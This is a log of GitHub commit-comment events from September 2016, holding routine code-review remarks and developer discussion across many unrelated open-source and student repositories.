{"id":"4518739304","type":"CommitCommentEvent","actor":{"login":"VitorTales"},"repo":{"name":"joaovictorr/The-Last-Choice-Projeto-Integrador---UNIPAM-2016-"},"payload":{"comment":{"id":18904445,"position":8,"line":8,"path":"README.md","commit_id":"4e6879677b981ab638cf4dfbc5d5cc1e57f6b427","created_at":"2016-09-06T01:02:49Z","updated_at":"2016-09-06T01:02:49Z","body":"system(\"pause>null);"}},"created_at":"2016-09-06T01:02:49Z"}
{"id":"4518739567","type":"CommitCommentEvent","actor":{"login":"rrequero"},"repo":{"name":"control-tower/ct-ui"},"payload":{"comment":{"id":18904446,"position":16,"line":32,"path":"app/src/components/microserviceView.jsx","commit_id":"92d6974fbb568ebaa66369c1ad680635c867ae4f","created_at":"2016-09-06T01:02:56Z","updated_at":"2016-09-06T01:02:56Z","body":"Is Refresh result :)"}},"created_at":"2016-09-06T01:02:56Z"}
{"id":"4518740163","type":"CommitCommentEvent","actor":{"login":"rrequero"},"repo":{"name":"control-tower/ct-ui"},"payload":{"comment":{"id":18904448,"position":17,"line":32,"path":"app/src/components/endpointView.jsx","commit_id":"92d6974fbb568ebaa66369c1ad680635c867ae4f","created_at":"2016-09-06T01:03:16Z","updated_at":"2016-09-06T01:03:16Z","body":"Is Refresh result :)"}},"created_at":"2016-09-06T01:03:16Z"}
{"id":"4518741870","type":"CommitCommentEvent","actor":{"login":"rpherbig"},"repo":{"name":"rcuhljr/dr-lich"},"payload":{"comment":{"id":18904450,"position":null,"line":null,"path":null,"commit_id":"e308ef8baf3aa4f5e6e5c24490cec0359fdb7fbd","created_at":"2016-09-06T01:04:09Z","updated_at":"2016-09-06T01:04:09Z","body":"I believe so. I used the same approach as the cases on lines 4846 and 4859."}},"created_at":"2016-09-06T01:04:09Z"}
{"id":"4518742750","type":"CommitCommentEvent","actor":{"login":"cjjnjust"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18904451,"position":81,"line":112,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SaslRpcHandler.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-06T01:04:39Z","updated_at":"2016-09-06T01:04:39Z","body":"The receive interface does not declare throw clause which means it only allow unchecked exception to bubble up, actually sent back to client as string format. Throw the IOException will cause compile error."}},"created_at":"2016-09-06T01:04:39Z"}
{"id":"4518744243","type":"CommitCommentEvent","actor":{"login":"chengkunchen"},"repo":{"name":"chengkunchen/-"},"payload":{"comment":{"id":18904452,"position":null,"line":null,"path":null,"commit_id":"30c41a48ccafc6b0e0da653b7da6dc8f5938944b","created_at":"2016-09-06T01:05:29Z","updated_at":"2016-09-06T01:05:29Z","body":"rrfr"}},"created_at":"2016-09-06T01:05:29Z"}
{"id":"4518746279","type":"CommitCommentEvent","actor":{"login":"BohuTANG"},"repo":{"name":"BohuTANG/percona-xtrabackup"},"payload":{"comment":{"id":18904457,"position":null,"line":null,"path":null,"commit_id":"b43ba1b25deff2ba21eb9030b49413e1851f263b","created_at":"2016-09-06T01:06:37Z","updated_at":"2016-09-06T01:06:37Z","body":"@zhangzaki \r\nThe better way to do a backup and restore with xtrabackup is as follows:\r\n1. backup:\r\n    innobackupex --defaults-file=$master_cnf  --user=$user $backup_dir\r\n2. restore\r\n    a. innobackupex --defaults-file=$slave_cnf --apply-log $backup_dir\r\n    b. innobackupex --defaults-file=$slave_cnf --copy-back $backup_dir\r\n\r\nmore manuals are here:\r\nhttps://www.percona.com/doc/percona-xtrabackup/2.4/innobackupex/innobackupex_script.html"}},"created_at":"2016-09-06T01:06:37Z"}
{"id":"4518751909","type":"CommitCommentEvent","actor":{"login":"PhDP"},"repo":{"name":"david-beauchesne/Predict_interactions"},"payload":{"comment":{"id":18904466,"position":null,"line":null,"path":null,"commit_id":"5a05c3a72bf5529050608f313d0198b8ee69da73","created_at":"2016-09-06T01:09:51Z","updated_at":"2016-09-06T01:09:51Z","body":"Exactly! :P"}},"created_at":"2016-09-06T01:09:51Z"}
{"id":"4518753767","type":"CommitCommentEvent","actor":{"login":"Chetch619"},"repo":{"name":"EnigmaGames/Desiccated---Main"},"payload":{"comment":{"id":18904470,"position":null,"line":null,"path":null,"commit_id":"8772bce1cd82eef7ef4e5b25edba2e99b536865e","created_at":"2016-09-06T01:10:46Z","updated_at":"2016-09-06T01:10:46Z","body":"Also switched substance plugin to gpu rendering for 4k textures\r\n"}},"created_at":"2016-09-06T01:10:46Z"}
{"id":"4518756723","type":"CommitCommentEvent","actor":{"login":"pyrodie18"},"repo":{"name":"pyrodie18/Bro-Analysis"},"payload":{"comment":{"id":18904473,"position":null,"line":null,"path":null,"commit_id":"63f1c83ced1b8da67e3a5a9380b5c56fe29cef37","created_at":"2016-09-06T01:12:18Z","updated_at":"2016-09-06T01:12:18Z","body":"Used to close Request [14](https://github.com/pyrodie18/Bro-Analysis/issues/14)"}},"created_at":"2016-09-06T01:12:18Z"}
{"id":"4518760929","type":"CommitCommentEvent","actor":{"login":"AbeOmor"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18904484,"position":11,"line":8,"path":"public/js/core.js","commit_id":"0c2288f346ef436a34eea4ab5c058bc53f8bb3e5","created_at":"2016-09-06T01:14:35Z","updated_at":"2016-09-06T01:14:35Z","body":"Why not :uni .. What if we exapand to more universities?"}},"created_at":"2016-09-06T01:14:35Z"}
{"id":"4518766622","type":"CommitCommentEvent","actor":{"login":"ckoshien"},"repo":{"name":"ckoshien/JCBLScore"},"payload":{"comment":{"id":18904496,"position":28,"line":85,"path":"JCBLScore/src/main/java/cx/myhome/ckoshien/action/PlanAction.java","commit_id":"5f825bb1044a026cf5ce01dbacdbf582705179bd","created_at":"2016-09-06T01:17:33Z","updated_at":"2016-09-06T01:17:33Z","body":"同じリストを使って大丈夫か？"}},"created_at":"2016-09-06T01:17:33Z"}
{"id":"4518767841","type":"CommitCommentEvent","actor":{"login":"sarmadhashmi"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18904499,"position":11,"line":8,"path":"public/js/core.js","commit_id":"0c2288f346ef436a34eea4ab5c058bc53f8bb3e5","created_at":"2016-09-06T01:18:10Z","updated_at":"2016-09-06T01:18:10Z","body":"Because if we do :uni, /download route also becomes a university. And also: before this, we had an if statement in the pasteTextLayout.html (or something) including the right html file based on uni param. Now I can remove that and just redirect user to the correct html.\r\n\r\nIf and when we expand, we would have to add if statements in the html files all over the place. Now we just add a route for them."}},"created_at":"2016-09-06T01:18:10Z"}
{"id":"4518768913","type":"CommitCommentEvent","actor":{"login":"triblondon"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18904502,"position":null,"line":null,"path":null,"commit_id":"773edd3121ef002ea2bea9137ac00cdba82dc08a","created_at":"2016-09-06T01:18:43Z","updated_at":"2016-09-06T01:18:43Z","body":"OK, so to do the same we'd just run our existing HTTP tests through the CDN."}},"created_at":"2016-09-06T01:18:43Z"}
{"id":"4518770577","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"ros-naoqi/pepper_robot"},"payload":{"comment":{"id":18904507,"position":4,"line":6,"path":"pepper_bringup/launch/pepper_full_py.launch","commit_id":"50e043fa7470058377be4691b678361a29c056d8","created_at":"2016-09-06T01:19:35Z","updated_at":"2016-09-06T01:19:35Z","body":"I think \"true\" is ROS convention, not \"True\", sorry for picky"}},"created_at":"2016-09-06T01:19:35Z"}
{"id":"4518770901","type":"CommitCommentEvent","actor":{"login":"triblondon"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18904508,"position":null,"line":null,"path":null,"commit_id":"773edd3121ef002ea2bea9137ac00cdba82dc08a","created_at":"2016-09-06T01:19:44Z","updated_at":"2016-09-06T01:19:44Z","body":"Oh, hang on, we don't have any http tests.  So we could create some and have them use the CDN."}},"created_at":"2016-09-06T01:19:44Z"}
{"id":"4518771009","type":"CommitCommentEvent","actor":{"login":"svidovich"},"repo":{"name":"svidovich/introcompsci_lab_1"},"payload":{"comment":{"id":18904509,"position":26,"line":26,"path":"e1_1.cpp","commit_id":"8a1627315688c0f52b3312ac97758722fdd2497b","created_at":"2016-09-06T01:19:47Z","updated_at":"2016-09-06T01:19:47Z","body":"I converted the input letter to a value. I crapped on myself when it worked\nso well. Kick ass idea.\n\nOn Fri, Sep 2, 2016 at 3:17 PM, NickVido <notifications@github.com> wrote:\n\n> If you look up the ascii table, you'll see that the letters are\n> contiguous... can you convert the input letter to a value so you can just\n> compare and see what range it is in?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/svidovich/introcompsci_lab_1/commit/8a1627315688c0f52b3312ac97758722fdd2497b#commitcomment-18885301>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQFeU41RAc71-auaxmaiVXHA_ZJ--R4Yks5qmHZkgaJpZM4J0Ah7>\n> .\n>\n\n\n\n-- \n~Sam Vidovich\n"}},"created_at":"2016-09-06T01:19:47Z"}
{"id":"4518771584","type":"CommitCommentEvent","actor":{"login":"everttonbs"},"repo":{"name":"HyuriMaciel/Ifacefanpage"},"payload":{"comment":{"id":18904510,"position":1,"line":1,"path":".gitignore","commit_id":"1b75111683663b35fd5de6701834f74e61e8092f","created_at":"2016-09-06T01:20:06Z","updated_at":"2016-09-06T01:20:06Z","body":"everton"}},"created_at":"2016-09-06T01:20:06Z"}
{"id":"4518772774","type":"CommitCommentEvent","actor":{"login":"AbeOmor"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18904516,"position":11,"line":8,"path":"public/js/core.js","commit_id":"0c2288f346ef436a34eea4ab5c058bc53f8bb3e5","created_at":"2016-09-06T01:20:37Z","updated_at":"2016-09-06T01:20:37Z","body":"Ok sounds good."}},"created_at":"2016-09-06T01:20:37Z"}
{"id":"4518773914","type":"CommitCommentEvent","actor":{"login":"AbeOmor"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18904526,"position":null,"line":null,"path":null,"commit_id":"0c2288f346ef436a34eea4ab5c058bc53f8bb3e5","created_at":"2016-09-06T01:21:16Z","updated_at":"2016-09-06T01:21:16Z","body":"Ok this looks good, You might need to do a similar thing for the french site too, i am guessing"}},"created_at":"2016-09-06T01:21:16Z"}
{"id":"4518776547","type":"CommitCommentEvent","actor":{"login":"droberts84"},"repo":{"name":"sbdeagle/blocitoff"},"payload":{"comment":{"id":18904536,"position":2,"line":2,"path":"config/routes.rb","commit_id":"eb112d4497b54d6d558be3126e80d98fb2bff310","created_at":"2016-09-06T01:22:40Z","updated_at":"2016-09-06T01:22:40Z","body":"the [REST standard](http://guides.rubyonrails.org/routing.html#crud-verbs-and-actions) is for `create` to be a `POST` instead of `get`, since you are submitting data to the application.  So this could be `post 'items/create'` or alternatively `resources :items, only: [:create]` which specifies to use the REST defaults."}},"created_at":"2016-09-06T01:22:40Z"}
{"id":"4518778007","type":"CommitCommentEvent","actor":{"login":"droberts84"},"repo":{"name":"sbdeagle/blocitoff"},"payload":{"comment":{"id":18904542,"position":5,"line":5,"path":"app/controllers/items_controller.rb","commit_id":"eb112d4497b54d6d558be3126e80d98fb2bff310","created_at":"2016-09-06T01:23:28Z","updated_at":"2016-09-06T01:23:28Z","body":"Where is `@item` defined?"}},"created_at":"2016-09-06T01:23:28Z"}
{"id":"4518779739","type":"CommitCommentEvent","actor":{"login":"AbeOmor"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18904548,"position":22,"line":18,"path":"parsers/uottawa.js","commit_id":"fb3f94efdec67583378e11135de4cb7acdb340da","created_at":"2016-09-06T01:24:10Z","updated_at":"2016-09-06T01:24:10Z","body":"Update comments to show that infoweb is for mobile"}},"created_at":"2016-09-06T01:24:10Z"}
{"id":"4518781794","type":"CommitCommentEvent","actor":{"login":"4yn"},"repo":{"name":"4yn/discord_rss_bot"},"payload":{"comment":{"id":18904558,"position":null,"line":null,"path":null,"commit_id":"a77333be015e53675e95a95d376e530c144d2235","created_at":"2016-09-06T01:25:07Z","updated_at":"2016-09-06T01:25:07Z","body":"Kind of? Very hacky and still needs to be polished though, still could use: \r\n\r\nUser-friendly wrapper for regex\r\nRegex on things that aren't title\r\nAnd i still have no idea why regex.match() doesn't work and i have to use regex.search() instead, pulling this may break code style consistency\r\n\r\nBut other than that its usable i guess "}},"created_at":"2016-09-06T01:25:07Z"}
{"id":"4518782052","type":"CommitCommentEvent","actor":{"login":"AbeOmor"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18904560,"position":17,"line":13,"path":"parsers/uottawa.js","commit_id":"fb3f94efdec67583378e11135de4cb7acdb340da","created_at":"2016-09-06T01:25:14Z","updated_at":"2016-09-06T01:25:14Z","body":"What about multi profs or prof what one word names"}},"created_at":"2016-09-06T01:25:14Z"}
{"id":"4518782909","type":"CommitCommentEvent","actor":{"login":"emk"},"repo":{"name":"faradayio/conductor"},"payload":{"comment":{"id":18904561,"position":22,"line":22,"path":"src/create_project.rs","commit_id":"d7bbf769d759597e1254c161b07a8e6c21711582","created_at":"2016-09-06T01:25:38Z","updated_at":"2016-09-06T01:25:38Z","body":"`unwrap` is actually a hard panic of the entire process,and it should only be used for:\r\n\r\n- Example code where you don't have a surrounding function, so you can't use `try!`.\r\n- Cases where it's effectively a `assert!(...this can never error...)`.\r\n\r\nI can show you how to get `Result<(), Error>` working; it's pretty easy."}},"created_at":"2016-09-06T01:25:38Z"}
{"id":"4518789820","type":"CommitCommentEvent","actor":{"login":"RJDTWO"},"repo":{"name":"RJDTWO/kernel_oneplus_onyx"},"payload":{"comment":{"id":18904596,"position":null,"line":null,"path":null,"commit_id":"41e4be2b2112aa8c0bd507fdb9cb10fdc4b57270","created_at":"2016-09-06T01:29:00Z","updated_at":"2016-09-06T01:29:00Z","body":"@GalaticStryder Thanks so much! I will test it immediately. Unfortunately I haven't had WiFi for a bit so I never aw this. I'll be sure to get back to you! "}},"created_at":"2016-09-06T01:29:00Z"}
{"id":"4518791585","type":"CommitCommentEvent","actor":{"login":"cjjnjust"},"repo":{"name":"cjjnjust/spark"},"payload":{"comment":{"id":18904597,"position":47,"line":47,"path":"common/network-common/src/main/java/org/apache/spark/network/sasl/SparkSaslAes.java","commit_id":"d87b3a6a6faa6838ca0191a1a04159e91e9f3696","created_at":"2016-09-06T01:29:50Z","updated_at":"2016-09-06T01:29:50Z","body":"It can, but I think this class is a help class,  the owners SparkSaslClient and SparkSaslServer implement SaslEncryptionBackend would be more reasonable."}},"created_at":"2016-09-06T01:29:50Z"}
{"id":"4518797078","type":"CommitCommentEvent","actor":{"login":"bkazemi"},"repo":{"name":"scanmem/scanmem"},"payload":{"comment":{"id":18904627,"position":null,"line":null,"path":null,"commit_id":"ab566aed025144c66c9fc31bb18f73a369754db5","created_at":"2016-09-06T01:32:23Z","updated_at":"2016-09-06T01:32:23Z","body":"Unfortunately, `printf()` doesn't handle Unicode natively, so we would have to use all the wide-char alternatives if we allowed multi-byte chars to pass through here."}},"created_at":"2016-09-06T01:32:23Z"}
{"id":"4518801625","type":"CommitCommentEvent","actor":{"login":"david-beauchesne"},"repo":{"name":"david-beauchesne/Predict_interactions"},"payload":{"comment":{"id":18904636,"position":null,"line":null,"path":null,"commit_id":"5a05c3a72bf5529050608f313d0198b8ee69da73","created_at":"2016-09-06T01:34:44Z","updated_at":"2016-09-06T01:34:44Z","body":"I checked, calculations is twice as fast like this. Thanks for the tip!"}},"created_at":"2016-09-06T01:34:44Z"}
{"id":"4518805616","type":"CommitCommentEvent","actor":{"login":"pyrodie18"},"repo":{"name":"pyrodie18/Bro-Analysis"},"payload":{"comment":{"id":18904648,"position":null,"line":null,"path":null,"commit_id":"f84d83e36f397cf81d3d1c80f875513e7211c1ef","created_at":"2016-09-06T01:36:40Z","updated_at":"2016-09-06T01:36:40Z","body":"Solved issue [12](https://github.com/pyrodie18/Bro-Analysis/issues/12)"}},"created_at":"2016-09-06T01:36:40Z"}
{"id":"4518808790","type":"CommitCommentEvent","actor":{"login":"huacnlee"},"repo":{"name":"wuxsoft/myblog"},"payload":{"comment":{"id":18904659,"position":8,"line":8,"path":"app/assets/javascripts/articles.coffee","commit_id":"2235cd1a5d0c1b4eefcdeceafc5b762248d44731","created_at":"2016-09-06T01:38:06Z","updated_at":"2016-09-06T01:38:06Z","body":"repliesSubmit -> submitReply\r\n\r\n动作在前，名词在后，此外这里回复是一条，用单数比较合适"}},"created_at":"2016-09-06T01:38:06Z"}
{"id":"4518823153","type":"CommitCommentEvent","actor":{"login":"satsuma-toshiaki"},"repo":{"name":"satsuma-toshiaki/ToDoList2"},"payload":{"comment":{"id":18904698,"position":null,"line":null,"path":null,"commit_id":"0a8645447fc7eaaf3bb28598429f825a7f9e8d7d","created_at":"2016-09-06T01:45:07Z","updated_at":"2016-09-06T01:45:07Z","body":"https://safe-woodland-84464.herokuapp.com/tasks"}},"created_at":"2016-09-06T01:45:07Z"}
{"id":"4518824340","type":"CommitCommentEvent","actor":{"login":"12345ieee"},"repo":{"name":"scanmem/scanmem"},"payload":{"comment":{"id":18904702,"position":null,"line":null,"path":null,"commit_id":"ab566aed025144c66c9fc31bb18f73a369754db5","created_at":"2016-09-06T01:45:39Z","updated_at":"2016-09-06T01:45:39Z","body":"Are you sure? Here everything works perfectly.\r\nI asked scanmem to search unicode chars and `list` printed exactly that chars I asked for."}},"created_at":"2016-09-06T01:45:39Z"}
{"id":"4518832219","type":"CommitCommentEvent","actor":{"login":"liggitt"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":18904738,"position":42,"line":171,"path":"pkg/cmd/server/origin/master_config.go","commit_id":"e8e488f19c50d79d3f1c038df743f70e196fa95c","created_at":"2016-09-06T01:49:23Z","updated_at":"2016-09-06T01:49:23Z","body":"are quorum reads expensive? accesstoken Gets happen a whole lot..."}},"created_at":"2016-09-06T01:49:23Z"}
{"id":"4518833717","type":"CommitCommentEvent","actor":{"login":"hieulq"},"repo":{"name":"cloudcomputinghust/CAL"},"payload":{"comment":{"id":18904740,"position":null,"line":null,"path":null,"commit_id":"91e0085286bb2dd266c258aa3b338feccf12b7fc","created_at":"2016-09-06T01:50:07Z","updated_at":"2016-09-06T01:50:07Z","body":"@daikk115 finished yet? can you push PR for me?"}},"created_at":"2016-09-06T01:50:07Z"}
{"id":"4518846412","type":"CommitCommentEvent","actor":{"login":"PhDP"},"repo":{"name":"david-beauchesne/Predict_interactions"},"payload":{"comment":{"id":18904764,"position":null,"line":null,"path":null,"commit_id":"5a05c3a72bf5529050608f313d0198b8ee69da73","created_at":"2016-09-06T01:56:00Z","updated_at":"2016-09-06T01:56:00Z","body":"Maybe:\r\n\r\n    inter <- length(intersect(resource_x, resource_y))\r\n\r\nMight not be faster, but intuitively it *seems* to do less work (unlike sum, length should not have to traverse the array).\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-06T01:56:00Z"}
{"id":"4518853983","type":"CommitCommentEvent","actor":{"login":"elakamarcus"},"repo":{"name":"elakamarcus/ruby"},"payload":{"comment":{"id":18904781,"position":null,"line":null,"path":null,"commit_id":"6a7e7fd922fec3685eef23d03f83964f37034a3f","created_at":"2016-09-06T01:59:35Z","updated_at":"2016-09-06T01:59:35Z","body":"This is what the output looks like. This script is preparation for using ruby to connect with the NexposeAPI.\r\n\r\nruby $ ruby parseIPrange.rb \r\nToo many columns in file. Try again\r\nruby $ ruby parseIPrange.rb \r\nHeaders\r\nfirst: ipstart\r\nsecond:  ipend\r\nthird:  location\r\n\r\n\r\nCIDR = 192.168.0.0/16\r\nFirst: 192.168.0.0\r\nLast: 192.168.255.255\r\nLocation:  Home\r\nFirst: 192.168.5.1\r\nLast:  10.168.5.255\r\nLocation:  livingroom\r\nFirst: 192.168.1.1\r\nLast:  192.168.1.255\r\nLocation:  guest"}},"created_at":"2016-09-06T01:59:35Z"}
{"id":"4520356366","type":"CommitCommentEvent","actor":{"login":"miguelbgouveia"},"repo":{"name":"ckan/ckan"},"payload":{"comment":{"id":18908534,"position":null,"line":null,"path":null,"commit_id":"0666e9459aaf292ddc9690068d4ab80028a4a127","created_at":"2016-09-06T10:00:18Z","updated_at":"2016-09-06T10:00:18Z","body":"I think this commit add an error in viewing resources with csv format. This issue is register here: https://github.com/ckan/ckan/issues/3233"}},"created_at":"2016-09-06T10:00:18Z"}
{"id":"4520356904","type":"CommitCommentEvent","actor":{"login":"thehowl"},"repo":{"name":"thehowl/dynamic-e"},"payload":{"comment":{"id":18908535,"position":null,"line":null,"path":null,"commit_id":"1c35c0cfdc7ce73a23010a0637cc76e4bf6081b3","created_at":"2016-09-06T10:00:23Z","updated_at":"2016-09-06T10:00:23Z","body":"shit, forgot this repo was watched by 12 people\r\n\r\ni was just trying to test if cross-repo referencing worked with <reponame>#<issue>. as the title goes, ignore"}},"created_at":"2016-09-06T10:00:23Z"}
{"id":"4520360236","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18908550,"position":10,"line":6,"path":"app/controllers/feed/imports_controller.rb","commit_id":"c36e355a0d0dca543060c1d1ede97e38d2f09a05","created_at":"2016-09-06T10:00:59Z","updated_at":"2016-09-06T10:00:59Z","body":"If this sets the strategy, where is the file passed to the service?"}},"created_at":"2016-09-06T10:00:59Z"}
{"id":"4520363413","type":"CommitCommentEvent","actor":{"login":"mmoskal"},"repo":{"name":"Microsoft/pxt"},"payload":{"comment":{"id":18908564,"position":null,"line":null,"path":null,"commit_id":"a9c0cd98ba8f98bffc1ee175a492bfa7a066bcd9","created_at":"2016-09-06T10:01:39Z","updated_at":"2016-09-06T10:01:39Z","body":"Awesome! Thanks!"}},"created_at":"2016-09-06T10:01:39Z"}
{"id":"4520364847","type":"CommitCommentEvent","actor":{"login":"slr"},"repo":{"name":"miguelfreitas/twister-html"},"payload":{"comment":{"id":18908567,"position":null,"line":null,"path":null,"commit_id":"36155be0cf0f999e897db1dcab710c2e87e82f80","created_at":"2016-09-06T10:01:56Z","updated_at":"2016-09-06T10:01:56Z","body":"![URI shortener modal preview](https://i.imgur.com/pQepSsO.png)"}},"created_at":"2016-09-06T10:01:56Z"}
{"id":"4520366439","type":"CommitCommentEvent","actor":{"login":"slr"},"repo":{"name":"miguelfreitas/twister-html"},"payload":{"comment":{"id":18908572,"position":null,"line":null,"path":null,"commit_id":"36155be0cf0f999e897db1dcab710c2e87e82f80","created_at":"2016-09-06T10:02:16Z","updated_at":"2016-09-06T10:02:16Z","body":"![URI shortener modal preview](https://i.imgur.com/pQepSsO.png)"}},"created_at":"2016-09-06T10:02:16Z"}
{"id":"4520372432","type":"CommitCommentEvent","actor":{"login":"vaibhav-iiit"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":18908612,"position":4,"line":131,"path":"src/Network/Request.php","commit_id":"f6072396b4764b3b4c4a671b7efbda200489a977","created_at":"2016-09-06T10:03:29Z","updated_at":"2016-09-06T10:03:29Z","body":"Hi @ADmad \r\nIf you have deleted the 'mobile' detector, then how will isMobile() will work. I'm not able to understand. Please help me."}},"created_at":"2016-09-06T10:03:29Z"}
{"id":"4520385524","type":"CommitCommentEvent","actor":{"login":"baijum"},"repo":{"name":"almighty/almighty-core"},"payload":{"comment":{"id":18908640,"position":24,"line":35,"path":"migration/migration.go","commit_id":"8a4a85c391d8bda112c3d86f2ca082d8dd10ae02","created_at":"2016-09-06T10:06:08Z","updated_at":"2016-09-06T10:06:08Z","body":"@kwk Just added it as a question here: https://github.com/almighty/almighty-core/issues/200"}},"created_at":"2016-09-06T10:06:08Z"}
{"id":"4520386055","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18908641,"position":null,"line":null,"path":null,"commit_id":"3c07aa1e19a3db219569c5cef9a14a093afced39","created_at":"2016-09-06T10:06:15Z","updated_at":"2016-09-06T10:06:15Z","body":"@hvr Can you please use `[ci skip]` for docs-only changes?"}},"created_at":"2016-09-06T10:06:15Z"}
{"id":"4520387297","type":"CommitCommentEvent","actor":{"login":"elvisciotti"},"repo":{"name":"ministryofjustice/opg-digi-deps-client"},"payload":{"comment":{"id":18908645,"position":null,"line":null,"path":null,"commit_id":"ee8fc61eccf428966f77f1c3e2ee4bb0a7e9b742","created_at":"2016-09-06T10:06:29Z","updated_at":"2016-09-06T10:06:29Z","body":"PHPStorm autocorrect :)"}},"created_at":"2016-09-06T10:06:29Z"}
{"id":"4520389263","type":"CommitCommentEvent","actor":{"login":"xsfour"},"repo":{"name":"xsfour/xsfour.github.io"},"payload":{"comment":{"id":18908651,"position":null,"line":null,"path":null,"commit_id":"61a2ca05b2334954c006b8ff106477c10b539338","created_at":"2016-09-06T10:06:54Z","updated_at":"2016-09-06T10:06:54Z","body":"借来传张图片\r\n![2016-09-05 3 41 22](https://cloud.githubusercontent.com/assets/8097302/18269859/9f8058ba-745c-11e6-902a-24ba188c3ddb.png)\r\n"}},"created_at":"2016-09-06T10:06:54Z"}
{"id":"4520389395","type":"CommitCommentEvent","actor":{"login":"lela-null"},"repo":{"name":"lela-null/internet-shit"},"payload":{"comment":{"id":18908654,"position":null,"line":null,"path":null,"commit_id":"7eb989340f3c42f99f31117bfeb7411e92de1510","created_at":"2016-09-06T10:06:55Z","updated_at":"2016-09-06T10:06:55Z","body":"v5.3a in the middle of updating, currently adding new database files."}},"created_at":"2016-09-06T10:06:55Z"}
{"id":"4520389471","type":"CommitCommentEvent","actor":{"login":"dereuromark"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":18908656,"position":4,"line":131,"path":"src/Network/Request.php","commit_id":"f6072396b4764b3b4c4a671b7efbda200489a977","created_at":"2016-09-06T10:06:56Z","updated_at":"2016-09-06T10:06:56Z","body":"Please see documentation and migration guide: http://book.cakephp.org/3.0/en/appendices/3-0-migration-guide.html#request"}},"created_at":"2016-09-06T10:06:56Z"}
{"id":"4520396742","type":"CommitCommentEvent","actor":{"login":"Poshwosh"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18908676,"position":null,"line":null,"path":null,"commit_id":"7118b066fbfd5fc5beab8d39ecbaa0c4f5d7ae27","created_at":"2016-09-06T10:08:29Z","updated_at":"2016-09-06T10:08:29Z","body":"Missed it, my bad.\r\n\r\n`11:05:10 (1)DisableNagle.js: Socket: 2516\r\n11:05:10 (1)DisableNagle.js: Setting TCP_NODELAY: -1\r\n11:05:10 (1)DisableNagle.js: WSAGetLastError: 0\r\n11:05:24 (1)DisableNagle.js: Socket: 2492\r\n11:05:24 (1)DisableNagle.js: Setting TCP_NODELAY: -1\r\n11:05:24 (1)DisableNagle.js: WSAGetLastError: 0\r\n11:05:29 (1)DisableNagle.js: Socket: 2516\r\n11:05:29 (1)DisableNagle.js: Setting TCP_NODELAY: -1\r\n11:05:29 (1)DisableNagle.js: WSAGetLastError: 0\r\n11:05:40 (1)DisableNagle.js: Socket: 2520\r\n11:05:40 (1)DisableNagle.js: Setting TCP_NODELAY: -1\r\n11:05:40 (1)DisableNagle.js: WSAGetLastError: 0`\r\n\r\nShouldn't it be \"1\" instead of \"-1\"? "}},"created_at":"2016-09-06T10:08:29Z"}
{"id":"4520406193","type":"CommitCommentEvent","actor":{"login":"gabsk"},"repo":{"name":"nmodi/harry-potter-monopoly"},"payload":{"comment":{"id":18908694,"position":null,"line":null,"path":null,"commit_id":"2ef48110bfb85fe134ddd428471af02f2a1f55d0","created_at":"2016-09-06T10:10:30Z","updated_at":"2016-09-06T10:10:30Z","body":"2ef4811"}},"created_at":"2016-09-06T10:10:30Z"}
{"id":"4520411319","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908703,"position":null,"line":null,"path":null,"commit_id":"f021d925c4500c972e904da3354c95a65a41a09d","created_at":"2016-09-06T10:11:38Z","updated_at":"2016-09-06T10:11:38Z","body":"TODO:\r\n\r\n- Picocom output\r\n- esptool + flash micropython + micropython FW"}},"created_at":"2016-09-06T10:11:38Z"}
{"id":"4520411769","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18908704,"position":73,"line":0,"path":"syntax.txt","commit_id":"a4e1081f69bdeec0d9761ec1d2222d0fc4b4f918","created_at":"2016-09-06T10:11:45Z","updated_at":"2016-09-06T10:11:45Z","body":"Да, и наследникам)"}},"created_at":"2016-09-06T10:11:45Z"}
{"id":"4520413481","type":"CommitCommentEvent","actor":{"login":"slaywell"},"repo":{"name":"moneyadviceservice/dough"},"payload":{"comment":{"id":18908711,"position":35,"line":35,"path":"spec/js/fixtures/SearchFocus.html","commit_id":"ea568b08e5e83bebd9556e2bbef738e7d18ea442","created_at":"2016-09-06T10:12:07Z","updated_at":"2016-09-06T10:12:07Z","body":"Please could you sort out the indentation?"}},"created_at":"2016-09-06T10:12:07Z"}
{"id":"4520419311","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18908721,"position":null,"line":null,"path":null,"commit_id":"bd60d828c5fc9cb066e5f647c87ecd6f70cb63a5","created_at":"2016-09-06T10:13:24Z","updated_at":"2016-09-06T10:13:24Z","body":"What's the reasoning behind this commit? 😄 "}},"created_at":"2016-09-06T10:13:24Z"}
